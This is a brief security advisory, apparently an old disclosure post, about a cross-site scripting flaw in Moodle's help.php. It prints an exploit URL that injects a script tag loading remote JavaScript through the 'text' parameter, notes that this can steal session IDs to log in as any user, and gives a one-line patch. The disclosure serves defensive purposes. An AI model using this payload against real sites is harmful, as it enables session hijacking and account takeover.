[02] Discussion: ~~~~~~~~~~~~~~~~ "Moodle is a course management system (CMS) - a software package designed to help educators create quality online courses. Such e-learning systems are sometimes also called Learning Management Systems (LMS) or Virtual Learning Environments (VLE)." www.moodle.org It has over 1000 *register* sites in 75 countries.
[03] Bug: ~~~~~~~~~ It is possible to execute any HTML/javascript command in help.php file by requesting: ------------------------------------------ http://{some_moodle_site}/help.php?text=<script src={url_to_script_to_execute}></script> ------------------------------------------ A code in {url_to_script_to_execute} will be executed. Bug enables to get users' session id's by writing a special script and use it to login as any user.
[04] Solution: ~~~~~~~~~~~~~~ a) This bug have been fixed in version 1.3.
For version 1.2 replace line 75: -------------------------------- 75| echo "$text"; -------------------------------- with -------------------------------- 75| echo clean_text($text); --------------------------------
[05] Credits: ~~~~~~~~~~~~~ Vulnerability discovered by Bartek Nowotarski (silence). All rights reserved.
[06] Disclaimer: ~~~~~~~~~~~~~~~~ This document and all the information it contains are provided "as is", for educational purposes only, without warranty of any kind, whether express or implied.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
